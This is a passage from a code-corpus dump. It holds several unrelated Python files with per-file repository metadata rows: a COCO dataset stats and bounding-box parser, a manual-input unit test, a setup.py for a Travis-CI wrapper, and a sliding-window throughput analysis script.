            n = n + 1
            img = Image.open(fname)
            istat = ImageStat.Stat(img)
            width, height = img.size
            # Running (incremental) averages of width/height and channel stats.
            avgw = (width + (n - 1) * avgw) / n
            avgh = (height + (n - 1) * avgh) / n
            self.img2l2bs[img_id][0].append(
                (
                    width / 3,
                    height / 3,
                    width / 3,
                    height / 3,
                )
            )  # hack to add a backgrnd box
            mean = (istat.mean + (n - 1) * mean) / n
            stddev = (istat.stddev + (n - 1) * stddev) / n
            self.img2sz[fname] = (width, height)
        self.chn_means = mean
        self.chn_stds = stddev
        self.avg_width = avgw
        self.avg_height = avgh
def load_stats(f_ann: str, img_dir: Path, force_reload: bool = False):
    """Load CocoDatasetStats from <img_dir>/stats.pkl, or compute and cache.

    f_ann: COCO annotation JSON path (used only when recomputing).
    img_dir: image directory; also where the pickle cache lives.
    force_reload: when True, ignore any cached pickle and recompute.
    """
    stats_fpath = f"{img_dir}/stats.pkl"
    stats = None
    if os.path.isfile(stats_fpath) and not force_reload:
        try:
            # FIX: `with` closes the handle even if unpickling fails; the
            # original pickle.load(open(...)) leaked the file object.
            with open(stats_fpath, "rb") as pkl_f:
                stats = pickle.load(pkl_f)
        except Exception as e:
            # Best-effort cache: a corrupt/incompatible pickle just
            # triggers a recompute below.
            print(f"Failed to read precomputed stats: {e}")
    if stats is None:
        stats = CocoDatasetStats(f_ann, img_dir)
        with open(stats_fpath, "wb") as pkl_f:
            pickle.dump(stats, pkl_f)
    return stats
def box_within_bounds(
    x, y, w, h, width, height, min_margin_ratio, min_width_height_ratio
):
    """
    Check that a bbox is large enough relative to the image and that its
    (x, y) anchor lies inside the allowed margins; True when both hold.
    """
    # Reject boxes smaller than the minimum fraction of the image size.
    if w < min_width_height_ratio * width or h < min_width_height_ratio * height:
        return False
    # Reject anchors that fall inside the excluded border strip.
    horizontal_margin = min_margin_ratio * width
    vertical_margin = min_margin_ratio * height
    x_ok = horizontal_margin <= x <= width - horizontal_margin
    y_ok = vertical_margin <= y <= height - vertical_margin
    return x_ok and y_ok
class SubCocoParser(Parser, LabelsMixin, BBoxesMixin, FilepathMixin, SizeMixin):
    """
    Albumentations data augmentation requires a certain bbox width-height
    w.r.t the primary image
    This Parser ensures that we filter for that
    See Issue : https://github.com/airctic/icevision/issues/467
    """

    def __init__(
        self,
        stats: CocoDatasetStats,
        min_margin_ratio=0.15,
        min_width_height_ratio=0.1,
        quiet=True,
    ):
        # Pre-filter every image's boxes with box_within_bounds; images
        # left with no valid box are skipped entirely.
        self.stats = stats
        self.data = (
            []
        )  # list of tuple of form (img_id, width, height, bbox, label_id, img_path)
        skipped = 0
        for img_id, imgfname in stats.img2fname.items():
            imgf = f"{stats.img_dir}/{imgfname}"
            width, height = stats.img2sz[imgf]  # updated
            bboxs = []
            lids = []
            for lid, x, y, w, h in stats.img2lbs[img_id]:
                if lid is not None and box_within_bounds(
                    x, y, w, h, width, height, min_margin_ratio, min_width_height_ratio
                ):
                    b = [int(x), int(y), int(w), int(h)]
                    _ = int(lid)
                    bboxs.append(b)
                    lids.append(_)
                else:
                    if not quiet:
                        print(f"warning: skipping lxywh of {lid, x, y, w, h}")
            if len(bboxs) > 0:
                self.data.append(
                    (
                        img_id,
                        width,
                        height,
                        bboxs,
                        lids,
                        imgf,
                    )
                )
            else:
                skipped += 1
        print(f"Skipped {skipped} out of {stats.num_imgs} images")

    def __iter__(self):
        yield from iter(self.data)

    def __len__(self):
        return len(self.data)

    # The accessors below unpack the per-image record tuple built above:
    # (img_id, width, height, bboxs, lids, img_path).
    def imageid(self, o) -> Hashable:
        return o[0]

    def filepath(self, o) -> Union[str, Path]:
        return o[5]

    def height(self, o) -> int:
        return o[2]

    def width(self, o) -> int:
        return o[1]

    def image_width_height(self, o) -> Tuple[int, int]:
        return (o[1], o[2])

    def labels(self, o) -> List[int]:
        return o[4]

    def bboxes(self, o) -> List[BBox]:
        return [BBox.from_xywh(x, y, w, h) for x, y, w, h in o[3]]
| 31.068182 | 88 | 0.547427 | 1,071 | 8,202 | 4.011204 | 0.222222 | 0.019786 | 0.005587 | 0.007449 | 0.092877 | 0.059125 | 0.05121 | 0.05121 | 0.05121 | 0.02933 | 0 | 0.018536 | 0.348817 | 8,202 | 263 | 89 | 31.186312 | 0.785808 | 0.125213 | 0 | 0.075676 | 0 | 0 | 0.045692 | 0.007615 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075676 | false | 0 | 0.07027 | 0.048649 | 0.232432 | 0.016216 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ed3804f209192e36d60aa99aa13e5c562c0312b | 3,386 | py | Python | test/test_manual_input.py | UAEKondaya1/expressvpn_leak_testing | 9e4cee899ac04f7820ac351fa55efdc0c01370ba | [
"MIT"
] | 219 | 2017-12-12T09:42:46.000Z | 2022-03-13T08:25:13.000Z | test/test_manual_input.py | UAEKondaya1/expressvpn_leak_testing | 9e4cee899ac04f7820ac351fa55efdc0c01370ba | [
"MIT"
] | 11 | 2017-12-14T08:14:51.000Z | 2021-08-09T18:37:45.000Z | test/test_manual_input.py | UAEKondaya1/expressvpn_leak_testing | 9e4cee899ac04f7820ac351fa55efdc0c01370ba | [
"MIT"
] | 45 | 2017-12-14T07:26:36.000Z | 2022-03-11T09:36:56.000Z | import os
import sys
import unittest
from multiprocessing import Process, Queue
import mock
from xv_leak_tools.log import L
from xv_leak_tools.manual_input import allow_manual_input, disallow_manual_input
from xv_leak_tools.manual_input import message_and_await_string
from xv_leak_tools.manual_input import message_and_await_enter
# from xv_leak_tools.manual_input import message_and_await_yes_no
class AnyStringWithSubstring(str):
    """Matcher for mock assertions: compares equal to any string that
    contains this value as a substring."""

    def __eq__(self, other):
        return str(self) in other

    def __repr__(self):
        return ".*%s.*" % str(self)
class AnyStringWithSubstrings(list):
    """Matcher for mock assertions: compares equal to any string that
    contains every element of this list as a substring."""

    def __eq__(self, other):
        return all(fragment in other for fragment in self)

    def __repr__(self):
        return ', '.join(".*{}.*".format(fragment) for fragment in self)
class TestManualInput(unittest.TestCase):
    """Exercises manual_input prompts in a child process with stdin fed
    through a pipe, so the parent test process is never blocked."""

    def setUp(self):
        allow_manual_input()

    def tearDown(self):
        disallow_manual_input()

    @staticmethod
    def _call_method_in_subprocess(method, input_):
        # Run `method(queue, read_fd)` in a child process; `input_` is
        # written to the pipe beforehand so the child's reads never block.
        # The child reports its result back through the queue.
        queue = Queue()
        rpipe, wpipe = os.pipe()
        proc = Process(target=method, args=(queue, rpipe,))
        os.write(wpipe, input_.encode())
        proc.start()
        proc.join()
        os.close(wpipe)
        os.close(rpipe)
        return queue.get()

    def test_message_and_await_enter(self):  # pylint: disable=no-self-use
        def call_message_and_await_enter(queue, fake_stdin):
            # Runs in the child: rebind stdin to the pipe, capture stdout,
            # and check the prompt text was printed.
            sys.stdin = os.fdopen(fake_stdin)
            with mock.patch('sys.stdout') as fake_stdout:
                L.configure()
                message_and_await_enter('Hello')
                fake_stdout.assert_has_calls([
                    mock.call.write(AnyStringWithSubstrings(['Hello', 'Press ENTER to continue'])),
                ])
            queue.put(None)
        TestManualInput._call_method_in_subprocess(call_message_and_await_enter, "\n")

    def test_message_and_await_string(self):
        def call_message_and_await_string(queue, fake_stdin):
            # Runs in the child: as above, but also returns the string
            # read from stdin via the queue.
            sys.stdin = os.fdopen(fake_stdin)
            with mock.patch('sys.stdout') as fake_stdout:
                L.configure()
                ret = message_and_await_string('Please give me some string data')
                fake_stdout.assert_has_calls([
                    mock.call.write(AnyStringWithSubstrings(['Please give me some string data'])),
                ])
            queue.put(ret)
        ret = TestManualInput._call_method_in_subprocess(call_message_and_await_string, "Bonza\n")
        self.assertEqual(ret, 'Bonza')
# def test_message_and_await_yes_no(self):
# def call_message_and_await_yes_no(queue, fake_stdin):
# sys.stdin = os.fdopen(fake_stdin)
# with mock.patch('sys.stdout') as fake_stdout:
# L.configure()
# ret = message_and_await_yes_no('This is a yes or no question')
# fake_stdout.assert_has_calls([
# mock.call.write(AnyStringWithSubstrings(['This is a yes or no question'])),
# ])
# queue.put(ret)
# for expected_in_out in [('y', True), ('n', False)]:
# ret = TestManualInput._call_method_in_subprocess(
# call_message_and_await_yes_no, expected_in_out[0])
# self.assertEqual(ret, expected_in_out[1])
| 33.86 | 99 | 0.633786 | 417 | 3,386 | 4.803357 | 0.251799 | 0.074888 | 0.112332 | 0.056915 | 0.54668 | 0.484274 | 0.427359 | 0.389416 | 0.389416 | 0.271593 | 0 | 0.000807 | 0.268458 | 3,386 | 99 | 100 | 34.20202 | 0.807832 | 0.232428 | 0 | 0.229508 | 0 | 0 | 0.055383 | 0 | 0 | 0 | 0 | 0 | 0.04918 | 1 | 0.180328 | false | 0 | 0.147541 | 0.04918 | 0.47541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ed4015a6c4a19ef552f600253d6f3d0dfc05c83 | 904 | py | Python | setup.py | guillermo-carrasco/pytravis | da09d9f64d81b0db3ab8fa070d473f54cda1303a | [
"MIT"
] | 3 | 2015-01-27T09:07:48.000Z | 2021-01-09T17:45:44.000Z | setup.py | guillermo-carrasco/pytravis | da09d9f64d81b0db3ab8fa070d473f54cda1303a | [
"MIT"
] | null | null | null | setup.py | guillermo-carrasco/pytravis | da09d9f64d81b0db3ab8fa070d473f54cda1303a | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
import sys, os
# Packaging metadata for the pytravis distribution.
version = '0.3'

setup(name='pytravis',
      version=version,
      description="Python wrapper for Travis-CI API",
      long_description="""\
Python wrapper for Travis-CI API. Set of scripts to get information from travis.""",
      classifiers=[],  # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
      # TYPO FIX: "countinuous" -> "continuous" in the PyPI keywords.
      keywords='travis ci continuous-integration api',
      author='Guillermo Carrasco Hernandez',
      author_email='guillermo.carrasco@scilifelab.se',
      url='http://guillermo-carrasco.github.com/pytravis/',
      license='GPLv3',
      packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
      include_package_data=True,
      zip_safe=True,
      install_requires=[
          'requests',
          'prettytable'
      ],
      # NOTE: installs the default config straight into the user's $HOME.
      data_files=[(os.environ['HOME'], ['config/.pytravisrc'])]
      )
| 34.769231 | 95 | 0.668142 | 103 | 904 | 5.757282 | 0.660194 | 0.040472 | 0.080944 | 0.091062 | 0.128162 | 0.128162 | 0.128162 | 0 | 0 | 0 | 0 | 0.00551 | 0.196903 | 904 | 25 | 96 | 36.16 | 0.811295 | 0.07854 | 0 | 0 | 0 | 0 | 0.403129 | 0.066185 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.086957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ed71fb1c4d7c7ac8578c5f7266cc08abffb712a | 2,524 | py | Python | exp/motivation/variable_throughput/nginx/analysis.py | sarsanaee/Backdraft | 5c60bdb17901d402ebc6feea2d43f26e56d66668 | [
"MIT"
] | null | null | null | exp/motivation/variable_throughput/nginx/analysis.py | sarsanaee/Backdraft | 5c60bdb17901d402ebc6feea2d43f26e56d66668 | [
"MIT"
] | null | null | null | exp/motivation/variable_throughput/nginx/analysis.py | sarsanaee/Backdraft | 5c60bdb17901d402ebc6feea2d43f26e56d66668 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import numpy as np
import sys
# Validate CLI usage: argv[1] is the window width, argv[2:] are trace paths.
if len(sys.argv) < 3:
    print("Error: invalid parameters: path to trace not provided")
    print("usage: ./program window [<path_to_trace>]")
    # Exit non-zero: this is an error path.  The original used exit(0),
    # which reported success to the calling shell/script.
    sys.exit(1)
# Build a list of (completion_timestamp, response_size_bytes) samples from
# every trace file named on the command line (argv[2:]).
ts_data = []
try:
    for j in range(2, len(sys.argv)):
        path_to_trace = sys.argv[j]
        data = np.loadtxt(path_to_trace)
        # Per-response size in bytes.  NOTE(review): 79 vs 237 are hard-coded
        # payload sizes tied to specific traces (the trace at argv index 3 is
        # the larger one) — confirm against the experiment setup.
        size = 79
        if j == 3:
            size = 237
        print(size)
        for i in data:
            # Column 0 + column 1 yields the sample's completion time;
            # presumably start time + latency — verify against the trace format.
            ts_data.append((i[0] + i[1], size))
except Exception as e:
    print("Error: ", e)
    # Abort with a failure status (the original exit(0) signalled success).
    sys.exit(1)
# data = np.loadtxt("/tmp/ab_stats_2_core.txt")
# Convert to an (N, 2) array of (completion_timestamp, bytes) rows, then sort
# by timestamp (column 0) so the sliding window below scans samples in time
# order.
ts_data = np.array(ts_data)
# ts_data.sort()
ts_data = ts_data[ts_data[:, 0].argsort()]
t_data = []  # one throughput value per window position
# Window width; overridden by argv[1].  NOTE(review): assumed to be in the
# same time unit as the trace timestamps — confirm against the trace format.
sliding_wnd = 50
if sys.argv[1]:
    sliding_wnd = int(sys.argv[1])
# bytes_per_request = 79
counter = 0
tput = 0
window = []
# Running byte total of the samples currently inside the window, seeded with
# the first sample (which starts inside the window).
total_bytes = ts_data[0][1]
cnt = 0
size = len(ts_data)
s_wnd_idx = 0  # index of the oldest sample in the window (left edge)
e_wnd_idx = 0  # index of the newest sample in the window (right edge)
# Slide a time window of width sliding_wnd over the sorted samples: grow the
# right edge while the time span fits in the window; otherwise emit one
# throughput value and advance the left edge by one sample.  Once the right
# edge reaches the last sample, the remaining iterations drain the window
# until the two edges meet.
while(e_wnd_idx < size - 1 or e_wnd_idx != s_wnd_idx):
    if e_wnd_idx < size - 1 and ts_data[e_wnd_idx][0] - ts_data[s_wnd_idx][0] <= sliding_wnd:
        # Window still fits: pull the next sample in and account its bytes.
        e_wnd_idx += 1
        total_bytes += ts_data[e_wnd_idx][1]
        continue
    # Emit throughput (bytes per window unit) for the current window.  The
    # newest sample's bytes are excluded — presumably because it is the one
    # that overflowed the window; verify this off-by-one against the intended
    # semantics (during the drain phase the same exclusion still applies).
    tput = (total_bytes - ts_data[e_wnd_idx][1]) / sliding_wnd
    t_data.append(tput)
    # Slide the left edge forward by one sample.
    total_bytes -= ts_data[s_wnd_idx][1]
    s_wnd_idx += 1

# Final window (edges met): emit the last throughput value.
tput = (total_bytes/sliding_wnd)
t_data.append(tput)
print(s_wnd_idx)
print(e_wnd_idx)
# Earlier variant of the window scan, kept by the author for reference:
# if e_wnd_idx % 1000000 == 0:
#     print("total size: ", size, " cur index:", e_wnd_idx)
# if e_wnd_idx - s_wnd_idx + 1 > 1 and ts_data[e_wnd_idx][0] - ts_data[s_wnd_idx][0] >= sliding_wnd:
#     # print("len window", wind_size)
#     #calculate the throughput
#     # tput = bytes_per_request * (len(window) - 1) / sliding_wnd
#     # tput = total_bytes * (e_wnd_idx - s_wnd_idx) / sliding_wnd
#     tput = (total_bytes - ts_data[e_wnd_idx][1]) / sliding_wnd
#     t_data.append(tput)
#     total_bytes -= ts_data[s_wnd_idx][1]
#     s_wnd_idx += 1
#     continue
# total_bytes += ts_data[e_wnd_idx][1]
# e_wnd_idx += 1
#
# if e_wnd_idx - s_wnd_idx > 0:
#     tput = total_bytes / sliding_wnd
#     t_data.append(tput)
#
# This part is just verification
print(len(t_data), len(ts_data))
# f = ts_data[0]
# for i in range(1, len(ts_data)):
#     ts_data[i][0] = ts_data[i][0] - f[0]
# f[0] = 0
# Persist the sorted timestamps and the throughput series for later plotting.
np.savetxt("x_data.txt", ts_data[:,0])
np.savetxt("y_data_200.txt", t_data)
| 23.155963 | 104 | 0.614501 | 439 | 2,524 | 3.225513 | 0.207289 | 0.127119 | 0.088983 | 0.079096 | 0.42726 | 0.375706 | 0.307203 | 0.268362 | 0.234463 | 0.179379 | 0 | 0.036326 | 0.236529 | 2,524 | 108 | 105 | 23.37037 | 0.698495 | 0.41878 | 0 | 0.08 | 0 | 0 | 0.086653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0.14 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |